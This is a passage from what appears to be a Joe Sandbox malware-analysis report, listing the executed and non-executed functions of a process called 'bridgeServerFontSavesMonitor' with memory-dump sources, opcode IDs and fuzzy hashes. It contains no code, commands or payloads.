                                                            • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                            • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                            Function 00007FFD9BADDCF9 Relevance: .0, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bad1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a3ec0a83d04cfc53d7dd9c709957ba6b02c29a2621fd7f56c68108ce20f688e6
                                                            • Instruction ID: d8596333c1a685fec9ffb6fa7e50f08d61640bf1850e19048f7cee50ab092388
                                                            • Opcode Fuzzy Hash: a3ec0a83d04cfc53d7dd9c709957ba6b02c29a2621fd7f56c68108ce20f688e6
                                                            • Instruction Fuzzy Hash: 55E04F2154F3C04FC70B973088B88403F60DE1721034A41EAC145CF2B3E9298C49C712
                                                            Function 00007FFD9BAD9619 Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bad1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5586f2709923e3e63ab9e2416f827a0e6986343b6f8a25e9d607d7d1ee86f90d
                                                            • Instruction ID: 764b4fe28e2f3e9e3f32a2090d98fc8db418f5b6347ceac4690ffa8c3dbcaa6d
                                                            • Opcode Fuzzy Hash: 5586f2709923e3e63ab9e2416f827a0e6986343b6f8a25e9d607d7d1ee86f90d
                                                            • Instruction Fuzzy Hash: B5E0173190A7884FC70A9B34C8A99813FB0EE2B21178B01C7D045CF5B3EA5D9D89CB52
                                                            Function 00007FFD9BAD8079 Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bad1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d7b24fd322f75d84d4e041a85961962df5f306c7f4bff496cdcead6ac31392b7
                                                            • Instruction ID: 48debac365b98765a17233f4ab4c5745b4235a8121f8383cc6a63751153a8cf0
                                                            • Opcode Fuzzy Hash: d7b24fd322f75d84d4e041a85961962df5f306c7f4bff496cdcead6ac31392b7
                                                            • Instruction Fuzzy Hash: 57E04F2154F3C04FC70B973088788547F60DE6721038A40EEC145CF2B3E9298D49C702
                                                            Function 00007FFD9BADDC79 Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bad1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1f7afa59c7c3422e8d34bf0709c94a0c543fdb52c7ee398054baa0a0d49839b1
                                                            • Instruction ID: c988147bbe31e2699244aa8aa82b063682caa8f0438433b21a54cb75430faaf4
                                                            • Opcode Fuzzy Hash: 1f7afa59c7c3422e8d34bf0709c94a0c543fdb52c7ee398054baa0a0d49839b1
                                                            • Instruction Fuzzy Hash: 20E0BF6154E7C44FC74B973588B88547F60DE6B21178A41EEC145CF6B3E6298949C712
                                                            Function 00007FFD9BAA6A11 Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9af5bc28fc2c0f0b71dd5e592dfd76922cbb1878aa8f2e7de69573f6f38a7678
                                                            • Instruction ID: 592830685c710e191fb463840f7aeedee90a1c284bcab971093a6569cda1cf6c
                                                            • Opcode Fuzzy Hash: 9af5bc28fc2c0f0b71dd5e592dfd76922cbb1878aa8f2e7de69573f6f38a7678
                                                            • Instruction Fuzzy Hash: C4E01220F0901E4BFBB4A794C8607B962A2AF99704F1640B4D80DD33E2DDB86F858755
                                                            Function 00007FFD9BAA5384 Relevance: .0, Instructions: 20COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a694a85e57c89b96afa3afa0940e3ba856f579c8a2424d16d51d4f95c1ccaad7
                                                            • Instruction ID: bd3442ea4e735877b8db32a656f572c63090908754372b42d4afd2c019a513ff
                                                            • Opcode Fuzzy Hash: a694a85e57c89b96afa3afa0940e3ba856f579c8a2424d16d51d4f95c1ccaad7
                                                            • Instruction Fuzzy Hash: 1DE0EC24F0A90E4FEEA4FBA480786B822C39F94710F0A40B4D40EC71B2DDA8A9014720
                                                            Function 00007FFD9BAC5482 Relevance: .0, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bac3000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 82c2b13536649c25170b14d7f89db60f473384acc32ce7d392df9d5bdd653a74
                                                            • Instruction ID: 675399bea133c141571d710060e6d11646f65e915d5872b137331b473c7de563
                                                            • Opcode Fuzzy Hash: 82c2b13536649c25170b14d7f89db60f473384acc32ce7d392df9d5bdd653a74
                                                            • Instruction Fuzzy Hash: EEC0121275D81D0A7198A19C38621FC82C2D7C813571513F7E00CC228ADC0A598302C4
                                                            Function 00007FFD9BAD20F0 Relevance: .0, Instructions: 18COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bad1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                            • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                            • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                            • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                            Function 00007FFD9BADBDE0 Relevance: .0, Instructions: 17COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bad1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9f89cb3f62b3182ca9adc3d9aed498fb5175fa03025083ebc1b10905a140eb21
                                                            • Instruction ID: 4339d47ac68149d94b6e92adbd09f30198c9aee081fcd651f25a493664ab72a1
                                                            • Opcode Fuzzy Hash: 9f89cb3f62b3182ca9adc3d9aed498fb5175fa03025083ebc1b10905a140eb21
                                                            • Instruction Fuzzy Hash: A2D01234B919044FC71CA738885987473A1EBAA217BD551A9D00AC72B1D9AADD89C741
                                                            Function 00007FFD9BAD75B8 Relevance: .0, Instructions: 17COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bad1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e90708a79087e72b77d4e0fa24157253c780a8196c08309517985a8ca87fb076
                                                            • Instruction ID: f1a3aac253044cf54433ac86247a951df864d955bb2f13edb0b8bce7e217b5a2
                                                            • Opcode Fuzzy Hash: e90708a79087e72b77d4e0fa24157253c780a8196c08309517985a8ca87fb076
                                                            • Instruction Fuzzy Hash: 4CD01234B519044FC71CB7388859C7473A1EBAA216B9545A9D00AC72B1D96ADD89C741
                                                            Function 00007FFD9BAA0835 Relevance: .0, Instructions: 16COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 410e05bf80eb868e35b7a61e13c3ebda97f337d5ee954246124ba18280ece236
                                                            • Instruction ID: 4ca0cf5f36246c5a70c8128036d966815203504818490876a24fa534440c4671
                                                            • Opcode Fuzzy Hash: 410e05bf80eb868e35b7a61e13c3ebda97f337d5ee954246124ba18280ece236
                                                            • Instruction Fuzzy Hash: 98C01210B5740D51D43473AEEC664EDB741AF4811CF864171E40D84096DC491587C1AA
                                                            Function 00007FFD9BAA0B9D Relevance: .0, Instructions: 14COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2e3223773806dd1eeb8a33bfc36a23128a0ee8a43556ffbef35106e3682b1600
                                                            • Instruction ID: 951c45c2a0a23ea344f7b847046ce02511c6079dafc3ae047fc3d06edc29c598
                                                            • Opcode Fuzzy Hash: 2e3223773806dd1eeb8a33bfc36a23128a0ee8a43556ffbef35106e3682b1600
                                                            • Instruction Fuzzy Hash: 27C0123062A80E8FDA90BB68C889824BBA0FB0E201BDA00E0E04CC71A1D65A98908700
                                                            Function 00007FFD9BAA06A5 Relevance: .0, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 607a3deceb6852d5288b94f2c8b9b075914afb68c719db66ca5244cb50052f0a
                                                            • Instruction ID: 0268459102ce0c551be7b4bb65256f8e7f6a4332d8e466b57c9c7ba72adca42b
                                                            • Opcode Fuzzy Hash: 607a3deceb6852d5288b94f2c8b9b075914afb68c719db66ca5244cb50052f0a
                                                            • Instruction Fuzzy Hash: 57C01200F0B40E01E43133AA14620ACA2025BC4E18FD30032D00C800A198DD22C901AA
                                                            Function 00007FFD9BAA308E Relevance: .0, Instructions: 11COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4a380af7e924fd9ea9c489912805d20128229eef10771f8a3219d7f69da5e624
                                                            • Instruction ID: ef7e314609c2c86b0026b4e4c6a400b77b6b5ab3502ba962519fd29775be73fe
                                                            • Opcode Fuzzy Hash: 4a380af7e924fd9ea9c489912805d20128229eef10771f8a3219d7f69da5e624
                                                            • Instruction Fuzzy Hash: FEC00214F2AD1E5BEAF8A7B480756FD11C36F45B00F460578D04EE36E2DDBC7A808AA5
                                                            Function 00007FFD9BAB7D6E Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bab0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ac167182980d6bb7719544e827bbe8c50cba53643e7d764df05c88bb05699b2a
                                                            • Instruction ID: fa3c0f304aa39a95f9d292ac72c8feaef834e66786fcb1ba01bca49d30fd00f9
                                                            • Opcode Fuzzy Hash: ac167182980d6bb7719544e827bbe8c50cba53643e7d764df05c88bb05699b2a
                                                            • Instruction Fuzzy Hash: 11D0C930E09628CEEBA0DB68C851B5877B2FF48310F5002F6C01DE22CACB356D819F40
                                                            Function 00007FFD9BAA34BF Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3a8b391b1d605d60b120aabef3b4dead3810500b3bf232f64d55afb6e3688468
                                                            • Instruction ID: 4d53dcf905e591c3a9d6d4e090dd44042764639509f5eb9ca4d9cd6f23299cd5
                                                            • Opcode Fuzzy Hash: 3a8b391b1d605d60b120aabef3b4dead3810500b3bf232f64d55afb6e3688468
                                                            • Instruction Fuzzy Hash: A7C04C01F1CC2A17E25966144C25A7E04535F54729FD901B4E41FC72DECD5D5E0206D6
                                                            Function 00007FFD9BAA06C8 Relevance: .0, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1331302ace8906dc7ff6d84222f3b4709e12167f194fc678014da51f1390e612
                                                            • Instruction ID: 5d4eb65805904c88ee28bc93bcbdd05bedc58eeb57ca7ffbcbff11d570561cfa
                                                            • Opcode Fuzzy Hash: 1331302ace8906dc7ff6d84222f3b4709e12167f194fc678014da51f1390e612
                                                            • Instruction Fuzzy Hash: DFB01200D5B44F01E43433FB089206874415B44204FC20070D40CC019198CD22D802A7
                                                            Function 00007FFD9BAB2C40 Relevance: .0, Instructions: 7COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bab0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1249c1b0514c7178be080b616e912f9abb5f72fd4ef16b669b0acf00b4ae93e6
                                                            • Instruction ID: 8e4a554a8a868c483c7bc90b5ca82e478f5e8ff5e2530f32cd6f6945cdbe1566
                                                            • Opcode Fuzzy Hash: 1249c1b0514c7178be080b616e912f9abb5f72fd4ef16b669b0acf00b4ae93e6
                                                            • Instruction Fuzzy Hash: BEA00208D9780F11D81872FB1D9709474915FAA154FC61961E80980196FCCE17E943A3
                                                            Function 00007FFD9BADD5A0 Relevance: .0, Instructions: 7COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bad1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c7d2018242a0126bf40494a73c7f59b4a5ac1d0e95081e02a01ac1a34b36981f
                                                            • Instruction ID: ca252bbcc9c737bd95515a3503bf23c8f258f5e205a98fef31eae69f3472ac0f
                                                            • Opcode Fuzzy Hash: c7d2018242a0126bf40494a73c7f59b4a5ac1d0e95081e02a01ac1a34b36981f
                                                            • Instruction Fuzzy Hash: 55A00144D6682E01A91832BA0A965A534915A88296FC902A9A948892D7E88D52EA12A2
                                                            Function 00007FFD9BAA6A8C Relevance: .0, Instructions: 7COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cac71e77d6b68aa96a6892ae0be65438d06d493e10b968ad6f9787162aca6423
                                                            • Instruction ID: 8c43bb75ea278a86393614c8a78f3bb6d6f876162e107514682160d96059ff44
                                                            • Opcode Fuzzy Hash: cac71e77d6b68aa96a6892ae0be65438d06d493e10b968ad6f9787162aca6423
                                                            • Instruction Fuzzy Hash: 4EB09201F0E12B56F1B003E4026927902D34F64784F0B0438E80CC61F2FDDDAE010066

                                                            Non-executed Functions

                                                            Function 00007FFD9BAA09B0 Relevance: 5.2, Strings: 4, Instructions: 195COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: c9$!k9$"s9$#{9
                                                            • API String ID: 0-1692736845
                                                            • Opcode ID: cb88ab6d95ab85b49039db9082cebfb02cedc4d518de146a2e869499167111c5
                                                            • Instruction ID: e1a95792946ef8f847ff6465fc7ab025d94a6d83d403f436d8d0e3fa9b867144
                                                            • Opcode Fuzzy Hash: cb88ab6d95ab85b49039db9082cebfb02cedc4d518de146a2e869499167111c5
                                                            • Instruction Fuzzy Hash: 2051BD17B0942745E339B3FD78219E96B449FA823FB0847B7F95E8D0C78C086486C2E9

                                                            Executed Functions

                                                            Function 00007FFD9BAC0D48 Relevance: 1.5, Strings: 1, Instructions: 267COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bac0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 5Y_H
                                                            • API String ID: 0-3237497481
                                                            • Opcode ID: a6408956d2b3e01635da5ccc2187ac92fd61d630a009c3fb138447bad701b18c
                                                            • Instruction ID: 8275a662f36012fc20c8b9628a6f4621dde7938023171d19e4deae8699700a8c
                                                            • Opcode Fuzzy Hash: a6408956d2b3e01635da5ccc2187ac92fd61d630a009c3fb138447bad701b18c
                                                            • Instruction Fuzzy Hash: 2691E6B1A1AA8D4FE7999B6888757B9BFE1FF5A320F4502BED049C72E2DB741401C740
                                                            Function 00007FFD9BAF1441 Relevance: .5, Instructions: 469COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9baf1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 24557b7aa28c420c0cfaf0d4d9ffeab2bc94fd6c9f416888d9be36c408598472
                                                            • Instruction ID: a3dd6c72aa180a5c3a5a4a3152ba562083e1a76e0f4b1248bb5776ae9da9db56
                                                            • Opcode Fuzzy Hash: 24557b7aa28c420c0cfaf0d4d9ffeab2bc94fd6c9f416888d9be36c408598472
                                                            • Instruction Fuzzy Hash: FBD19021B2E78D0BE32D4B684C920F53B91EBA2306B1986BDD5DBC7097D968A50783C1
                                                            Function 00007FFD9BAF1475 Relevance: .3, Instructions: 322COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9baf1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3a764c5e62d134ab750aebd527372de7f9a2934b3a6f6189f944106c42a80403
                                                            • Instruction ID: 2ac02787602e7f9aa4ae3e0c8e6bda0b457b8a5193720311f449bed3da830161
                                                            • Opcode Fuzzy Hash: 3a764c5e62d134ab750aebd527372de7f9a2934b3a6f6189f944106c42a80403
                                                            • Instruction Fuzzy Hash: 2B81C171F2D34E0BE32C4A684C920B17BD5EBE6216B1A867DD9DBC3197DC68B90742C1
                                                            Function 00007FFD9BAFA7C9 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9baf1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M
                                                            • API String ID: 0-3664761504
                                                            • Opcode ID: e50a372c66d73d6959bffac753331f53057a701bfd7f2146432d1e5f8e268a21
                                                            • Instruction ID: 1756b7ed639bd5e73031c1d9ae49dbd7a484f93142dc853b1486fea5542a7c9d
                                                            • Opcode Fuzzy Hash: e50a372c66d73d6959bffac753331f53057a701bfd7f2146432d1e5f8e268a21
                                                            • Instruction Fuzzy Hash: 58E0656160F7C44FDB15AA3484698947F70EF6721174A52EEC045CB1A3EA1D9886C701
                                                            Function 00007FFD9BAFA739 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9baf1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M
                                                            • API String ID: 0-3664761504
                                                            • Opcode ID: 1efa397fa057cd1a98d39ec1929409eca4709694baa5fd15f1f24b4f36f222a6
                                                            • Instruction ID: dbfe1148f7c8508a008613384f7039a97ab8a1aed294f159a683bd8f5a2eda34
                                                            • Opcode Fuzzy Hash: 1efa397fa057cd1a98d39ec1929409eca4709694baa5fd15f1f24b4f36f222a6
                                                            • Instruction Fuzzy Hash: E9F0656160F7C44FDB16AB3488698547F70EF6720174A52EFC445CF1A3EA1D9885C711
                                                            Function 00007FFD9BAFAFB9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9baf1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: I
                                                            • API String ID: 0-3707901625
                                                            • Opcode ID: 4fdc5037d1a2ffd65cb09e0cabd99c4174b2f00b8cc0503b2845a88e5437da41
                                                            • Instruction ID: 8a044a4d47703dffb4ca39fd4bb869024ee6461e978eeca7060392de76daab0e
                                                            • Opcode Fuzzy Hash: 4fdc5037d1a2ffd65cb09e0cabd99c4174b2f00b8cc0503b2845a88e5437da41
                                                            • Instruction Fuzzy Hash: 21E01AA154F7C44FCB16EB75887A9857FA0AE6721078B40EEC085CF1B3E62D8949C701
                                                            Function 00007FFD9BAF20D9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9baf1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: I
                                                            • API String ID: 0-3707901625
                                                            • Opcode ID: 4b94087cd1d380c1118e307e5decef35a618b8e6a1e81a5d2776b665a6c132bb
                                                            • Instruction ID: 55fdb63b9008d460a4d9902cd6b10540827652113c681a0da6b0002013a1fde3
                                                            • Opcode Fuzzy Hash: 4b94087cd1d380c1118e307e5decef35a618b8e6a1e81a5d2776b665a6c132bb
                                                            • Instruction Fuzzy Hash: 62E01A6254F7C44FCB16EB74886A9447FA0EE6731078B40EEC089CF1B3E62D9849C701
                                                            Function 00007FFD9BAD0906 Relevance: .9, Instructions: 866COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: db8d82aa4fd912582ab4b7ed5b1fe79fabc3275a32ae0ad90e8adfbf59dc8445
                                                            • Instruction ID: 72e3761972c78c95f93e47f2d6a6e9056a5ddd80193cc26c807724c85f231aab
                                                            • Opcode Fuzzy Hash: db8d82aa4fd912582ab4b7ed5b1fe79fabc3275a32ae0ad90e8adfbf59dc8445
                                                            • Instruction Fuzzy Hash: E752D731B1991E4FEBA8EB5884A56B973D2FFA8310F0506B9D05EC32E6DE747D818740
                                                            Function 00007FFD9BAD15F8 Relevance: .7, Instructions: 719COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
